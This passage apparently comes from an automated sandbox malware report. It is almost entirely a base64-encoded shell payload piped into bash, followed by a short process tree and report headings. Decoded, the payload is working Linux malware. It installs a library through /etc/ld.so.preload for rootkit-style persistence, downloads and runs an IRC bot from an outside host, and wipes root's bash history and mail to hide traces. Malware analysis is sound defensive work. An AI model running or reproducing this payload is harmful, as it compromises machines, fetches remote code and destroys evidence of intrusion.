yszL2F3ZUFtcU1mTU9ySGd0T21LTEx6RG52eFcveEp6M1ZueWg3Zmdyd2JPVG5SdTI0b3U0aEJRZXY2d3dqaXo0WWpSbWl5OHB3b3k4a25PNmlNUDNudGNtbnZNcEhoRHdLeWsrSk9BdHBJNUNlOWozYXhlNUw0NVBrdm9aRi93TUV2M2lPQjl5YVArUGlmNWxSZWV6bjZUK1g2VCsyUUdZRXhUdnBvZXBGOU9HdmtIYmYwandjNWJpaHdYY0taN25TVmt0dXY5S3NjUmV2OUlEN1NrZXR6VWVvMS9pYzE5RzhPSnhWVWY2VVR5ZVc2a2ZjWnhzSlhqeGVMdVp0S2Q0bnU3ejJPZGIzTzJ4ejU5NDJBRi8xQUYveWdHZmNNRGZkY0QvNFlCWGVlM3hLeHp3SnE5OWY3YzQ2UGM0NEJrSFA1UElQby9rSVFjLzMvZmE1Njg4NmFEL3N0ZiszUHVIeUNGUEphUm9xdFlmamZwRHFKQ2VJbXRKT1FScEtDcVM1WEJhN2t1a2U0TUpPYXlsRlZVTzlnK2dVRHFaU1VTMFNOamZzcjY1MFY0SjhsYmljbEJSZ29OeUpLVXBneWlxQkpNUk9keWZUQTVpRTA2U3NhWm1VWVVmMlNPcUdvdmpSdUdtVVZIVzB0aHJBcmNROVVVME9SeFg1QlIyUWdTbVFvQzBFdStEckJtNThGdStDT0VXZE8zWnZMTlQ3dHkxRlJKMG9MWFFFVFV0eDRLcE1HVGZiTDFwMSthZDJ6c3d1bTFYdDl3cFVRTnA2eDRNN2QzWndVeTM3Ymh1eStZZDhuVmRYVGQwN3BYM2J0NnlveE9qMEtjTDV2MncvSjFBZ0UraU1WSjJySmlSMlNOZ05BMm9TRlBOQ0pva0ZhaElMWlRNV0RHU1hTUlkybFVoWmpaWmM0c0t1aTFHSnBKZzdKanJSRjZ4aURYeDZVOUNhNDJVSmJGYmtMOWt4WkFmKzlXQ3ZaaHJpc0ZqN0M2VjFpTCt2bFMvdjdjL25naXZqWWNSa1dKQk5ZYjg0Y0VVNUVZUnJpbEd5ZTBSUlkyblV4WkJ4bVZLSkJFRVJYcVhTV2pJVDU0LzNQcjcwdmhHaXd6Z1R6TEsvRW82SE5TQ3lCK0owVmtRQ3lzRnlUQTFwb05od2U1eERjRmtQSVRBbzFHSjRhZFhWWkVmejhra25qdzJrLzl6RU94eitCd2pwenhQUnVLeUVrNThmb0wzQXN5ZXJWTVpYMGx4dHA4UjN4YTFJbVB2dyt6WmVwYnhhVStoWGc5bnoxWkFBZXFiMmJOMUwrUGlQMlNQSUV2STJPdVk5bVZXZnJYUWZxL0FJVDl5bHJObjYyakdkNk5DKzcyb3VQOWhyb3hRdVpXei9ab1lQOWIvRkxYZlFtVzJMbWVjN1JmQmZwR04vUUFxNUxZU0V2S1kyYjZTa2ZqOFZjR2VyZk1abnhUMHhYVHBlOFQ2RjFpNUdLOEtnVDhvMkxOMUx1T0swR0J4RzVJVjdOazZqZkZLUVYvcy83ZW92Zm44ZkZZZUUvVEY4ZmM5d2Q0cFg5cXAvcDhJOW14ZncvaWtvQy9HODNGazdBWFkrREx6cDlmYTY0dngveFV5OHZMTTN5dll1dFZ2MVhPeS95MHlZbStPYjVhM1NlMG51UG5QMjdIbmVCOHkrcy9zMmI3clZMM0IyZmVQVS8ydkNmYm1lcG51MW9jK3cvNVBnajFienc4MVdOc3AyalA2TThXWVBWdkhqMUY3Y2FjbjJ1ZG8vZUtQQzh6K2l3THVzZUUyUHlHZ285UitnRTRNK1AxckhTcisvcWprMnM3VFNwb2JmRnB3TG83L0JRNzJjemNhL0p5QWkvWXV1ZVNTU3k2NTVKSkxMcm5rMHY4UC9Rdk1LQ2NwQUZBQUFBPT0nCmNoYXR0ciAtUiAtaWEgL3RtcC8KZWNobyAkU09GSUxFIHwgYmFzZTY0IC1kID4gL3RtcC8uc2gudGFyLmd6Cm1rZGlyIC1wIC91c3IvbG9jYWwvbGliLyAyPi9kZXYvbnVsbAp0YXIgeHZmIC90bXAvLnNoLnRhci5neiAtQyAvdXNyL2xvY2FsL2xpYi8gMj4vZGV2L251bGwKcm0gLWYgL3RtcC8uc2gudGFyLmd6IDI+L2Rldi9udWxsCmZpCmNhdCAvZXRjL2xkLnNvLnByZWxvYWQgfCBncmVwICcvdXNyL2xvY2FsL2xpYi9zeXN0ZW1oZWFsdC5zbycgMj4vZGV2L251bGwgfHwgZWNobyAnL3Vzci9sb2NhbC9saWIvc3lzdGVtaGVhbHQuc28nID4+IC9ldGMvbGQuc28ucHJlbG9hZCAyPi9kZXYvbnVsbApjaGF0dHIgK2kgL2V0Yy9sZC5zby5wcmVsb2FkIDI+L2Rldi9udWxsCn0KCgpmdW5jdGlvbiBTRVRVUF9JUkNCT1QoKXsKaWYgWyAhIC1mICIvdXNyL2Jpbi9zYmluIiBdOyB0aGVuClpJR0dZX0dFVD0iaHR0cDovL2thaXNlcmZyYW56LmNjL3ppZ2d5X3NwcmVhZCIKY2hhdHRyIC1pYSAvdXNyLyAvdXNyL2Jpbi8gL3Vzci9iaW4vc2JpbiAyPi9kZXYvbnVsbAp3Z2V0ICRaSUdHWV9HRVQgLU8gL3Vzci9iaW4vc2JpbiAyPi9kZXYvbnVsbCB8fCBjdXJsICRaSUdHWV9HRVQgLW8gL3Vzci9iaW4vc2JpbiAyPi9kZXYvbnVsbCB8fCB3Z2UgJFpJR0dZX0dFVCAtTyAvdXNyL2Jpbi9zYmluIDI+L2Rldi9udWxsIHx8IGN1ciAkWklHR1lfR0VUIC1vIC91c3IvYmluL3NiaW4gMj4vZGV2L251bGwgfHwgd2RsICRaSUdHWV9HRVQgLU8gL3Vzci9iaW4vc2JpbiAyPi9kZXYvbnVsbCB8fCBjZGwgJFpJR0dZX0dFVCAtbyAvdXNyL2Jpbi9zYmluIDI+L2Rldi9udWxsIHx8IHdnZXQyICRaSUdHWV9HRVQgLU8gL3Vzci9iaW4vc2JpbiAyPi9kZXYvbnVsbCB8fCBjdXJsMiAkWklHR1lfR0VUIC1vIC91c3IvYmluL3NiaW4gMj4vZGV2L251bGwKY2htb2QgK3ggL3Vzci9iaW4vc2JpbgpmaQovdXNyL2Jpbi9zYmluCn0KCgpmdW5jdGlvbiBDTEVBTlVQX1RSQUNFUygpewpjaGF0dHIgLWlhIC92YXIvIC92YXIvbWFpbC8gL3Zhci9tYWlsL3Jvb3QKY2htb2QgMTc3NyAvdmFyL21haWwvcm9vdAplY2hvICIgIiA+IC92YXIvbWFpbC9yb290CmNoYXR0ciAraSAvdmFyL21haWwvcm9vdApjaGF0dHIgLWlhIC9yb290LyAvcm9vdC8uYmFzaF9oaXN0b3J5CmVjaG8gIiAiID4gL3Jvb3QvLmJhc2hfaGlzdG9yeQpjaGF0dHIgK2kgL3Jvb3QvLmJhc2hfaGlzdG9yeQpoaXN0b3J5IC1jIAp9CgoKSU5JVF9NQUlOCgo= | base64 -d | bashh 2>/dev/null 1>/dev/null"
      2⤵
        PID:567
        • /usr/bin/base64
          base64 -d
          3⤵
            PID:569

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads